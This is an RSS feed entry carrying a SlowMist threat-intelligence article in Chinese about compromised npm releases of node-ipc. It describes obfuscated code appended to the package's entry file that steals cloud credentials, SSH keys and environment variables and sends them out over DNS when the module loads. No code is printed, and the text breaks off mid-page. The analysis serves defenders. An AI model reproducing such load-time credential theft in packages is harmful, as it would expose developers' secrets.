<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/">
  <channel>
    <title>慢雾科技</title>
    <link>https://wechat2rss.xlab.app/feed/9e9c3c70e598266a1ac993e50458a10a6d853eb7.xml</link>
    <description>慢雾科技是一家专注区块链生态安全的公司，成立于 2018 年 1 月，主要通过“威胁发现到威胁防御一体化因地制宜的安全解决方案”服务了全球许多头部或知名的项目，已有商业客户上千家，客户分布在十几个主要国家与地区。&#xA;(wechat feed made by @ttttmr https://wechat2rss.xlab.app)</description>
    <managingEditor> (慢雾科技)</managingEditor>
    <image>
      <url>https://wx.qlogo.cn/mmhead/Q3auHgzwzM4FqAumbguXteG2OtztBWwTZ6xLLfTaIQfRvzdJhLZkibQ/0</url>
      <title>慢雾科技</title>
      <link>https://wechat2rss.xlab.app/feed/9e9c3c70e598266a1ac993e50458a10a6d853eb7.xml</link>
    </image>
    <item>
      <title>威胁情报｜node-ipc 遭供应链入侵投毒攻击分析</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247505005&amp;idx=1&amp;sn=d99d7f743d73c3f53f24b1cd2d71ddbf</link>
      <description>本次事件是 npm 公共生态中一起典型的供应链沦陷案例。攻击者通过复用真实项目的合法发布路径，精准在 node-ipc 的 CommonJS 入口文件中注入了恶意投毒逻辑，实现了‘无交互、加载即触发’的强隐蔽、高危攻击效果。</description>
      <content:encoded><![CDATA[<p>原创 <span>慢雾安全团队</span> <span>2026-05-15 19:50</span> <span style="display: inline-block;">中国香港</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=fb4491f7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F8z8bibAexaCKHkk2HsJ8ogSe8GL7p7kJeWutvwdcicWHmibjbh2R5BEKYoibrbGwnkCY31TicHkhGGUIAVHhEvPFPrSm4R3Q75ka47ERV5Hc0ANg%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>本次事件是 npm 公共生态中一起典型的供应链沦陷案例。攻击者通过复用真实项目的合法发布路径，精准在 node-ipc 的 CommonJS 入口文件中注入了恶意投毒逻辑，实现了‘无交互、加载即触发’的强隐蔽、高危攻击效果。</p>
  <p><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">背景</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">2026 年 5 月 14 日，MistEye 威胁情报监控系统发现 npm 上的 Node.js IPC 工具包 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">node-ipc</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 同时出现 3 个异常发布版本：9.1.6、9.2.3 和 12.0.1。</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">node-ipc</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 周均下载量约 53 万次(Weekly Downloads 530,066)，被超过 400 个开源项目直接依赖，在 Node.js 生态中覆盖面极广。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100021337" data-ratio="0.537962962962963" width="602" data-type="png" data-w="1080" height="324" style="margin-left:0px;margin-top:0px;" src="https://wechat2rss.xlab.app/img-proxy/?k=94e8a80f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F8z8bibAexaCKjKr1mKU6X2DFYOstRW6pMiaPg7r5SGMu38bJAsh8KWyH9bCbZ1XrCvibvvDb6dPCt5Ng6ric5cKAHET7j9kSOPCG5T0jrnt4Bfs%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">事件链路显示这 3 个版本的 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">node-ipc.cjs</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 尾部均新增了约 80KB 混淆代码，具备凭据收集与 DNS 外传能力。经反混淆比对可确认 9.1.6、9.2.3 和 12.0.1 的入口代码字节级一致。</span></span></p><b data-pm-slice="0 0 []"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">本次样本属于正版包遭入侵场景，未出现伪造新包名。攻击者沿用 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">node-ipc</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 的真实命名空间、仓库元数据与作者信息，通过官方发布链路向用户正常依赖分发了受污染版本。受害者项目在 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">require(&#34;node-ipc&#34;)</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 路径加载时会静默触发恶意流程——窃取 AWS 云凭证、SSH 私钥、系统环境变量（含 API 密钥与数据库密码）、主机指纹及 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">/etc/hosts</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 等敏感信息，并通过 DNS 隧道分片外传至攻击者控制的远程服务器。该流程在依赖引入时不会自动执行（该包未配置 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">preinstall</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">/</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">install</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">/</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">postinstall</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">/</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">prepare</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 等生命周期脚本），风险点在于后续流程中的实际代码加载行为，例如构建脚本、测试运行或应用运行时执行了 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">require(&#34;node-ipc&#34;)</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">。</span></span></p></b><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">回溯版本历史，该组件的异常活动特征明显：</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 其版本 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">12.0.0</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 于 2024 年 8 月 12 日由原作者 riaevangelist 发布。此后，该项目陷入了长达 21 个月的停更期。直到近期，三个恶意版本突然被另一个名为 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">atiertant</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">(a.tiertant@atlantis-software.net)</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">的账号推送。尽管该账号目前位列 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">node-ipc</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 的维护者名单，但在本次投毒事件之前，其从未有过该组件的发布历史。</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="line-height: 25.6px;color: rgb(234, 51, 35);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;float: none;display: inline !important;">这种“高下载量休眠项目 + 长期停更后由新凭证突发推送”的异常行为，是 NPM 供应链攻击的典型范式。其幕后成因通常指向两种可能：一是 </span><span leaf="" style="line-height: 25.6px;color: rgb(234, 51, 35);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;float: none;display: inline !important;">atiertant</span><span leaf="" style="line-height: 25.6px;color: rgb(234, 51, 35);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;float: none;display: inline !important;"> 的账号凭证遭攻击者窃取；二是该账号本身就是攻击者为了实施本次投毒，通过某种手段被特意添加进维护者列表的。</span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">该事件与 2022 年历史投毒事件存在技术家族相似性，但目前不应直接归入同一漏洞单元。历史事件见</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">《CVE-2022-23812》(<a href="https://www.cve.org/CVERecord?id=CVE-2022-23812)" target="_blank">https://www.cve.org/CVERecord?id=CVE-2022-23812)</a></span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">，其风险特点主要在于破坏性行为；本轮样本主线为凭据窃取与隐蔽外传。</span></span></p><h1 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">MistEye 响应</span></span></h1><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;" data-remoteid="" data-asynid="" src="https://mmbiz.qpic.cn/sz_mmbiz_png/8z8bibAexaCLQ1fK7c3dicq9p8hkIQ5PXmicN3nUbnMaXpGrBatOUy8nRAAowenq4DP71qiajiadiaicYTe9hJT3ibXqsVzOlPf8NjStbJ91WibEFFOU/0?wx_fmt=png&amp;from=appmsg" data-src="" align="" alt="" border="" class="rich_pages wxw-img" data-ratio="" data-s="" data-type="png" data-w="" aria-label="" aria-braillelabel="" aria-description="" height="219" hspace="" ismap="" opacity="" sizes="" title="" type="" usemap="" vspace="" width="602" data-width="" data-height="" data-croporisrc="" data-cropx1="" data-cropx2="" data-cropy1="" data-cropy2="" data-cropselx1="" data-cropselx2="" data-cropsely1="" data-cropsely2="" data-backw="" data-backh="" data-copyright="" data-oversubscription-url="" data-before-oversubscription-url="" data-galleryid="" data-gallerysupplier="" data-cardimg="" data-fileid="" data-imgfileid="100021328" data-positionback="" data-imgqrcoded="" data-imgid="" data-upload="" data-fromlib="" data-aiimageid="" data-aiimagesource="" data-cacheurl="" data-aistatus="1" data-retry=""><span textstyle="" style="font-weight: normal;">MistEye 是由 SlowMist 自主研发的 Web3 威胁情报与动态安全监控系统，集成了安全监控与情报聚合能力，为用户提供实时的风险预警与资产守护。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在捕获本次 node-ipc 三个恶意版本后，MistEye 系统已触发高危告警并通知客户。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100021336" data-ratio="0.36320305052430885" width="602" data-type="png" data-w="1049" height="219" style="margin-left: 0px;margin-top: 0px;" src="https://wechat2rss.xlab.app/img-proxy/?k=caa1e918&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F8z8bibAexaCIgfInBszbzYymdHeTYjcQ6ZHvtCAKTksicva6icf2e4jic4W6220jrENYMpDnHsccE4RibL4ZLmh1F3sJPwtU0OLJNtwggrAicD2Gs%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 14px;font-weight: normal;">(</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 14px;font-weight: normal;"><a href="https://enterprise.misteye.io/threat-intelligence/SM-2026-480230" target="_blank">https://enterprise.misteye.io/threat-intelligence/SM-2026-480230</a></span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 14px;font-weight: normal;">)</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100021340" data-ratio="0.9629629629629629" width="602" data-type="png" data-w="1080" height="580" style="margin-left: 0px;margin-top: 0px;" 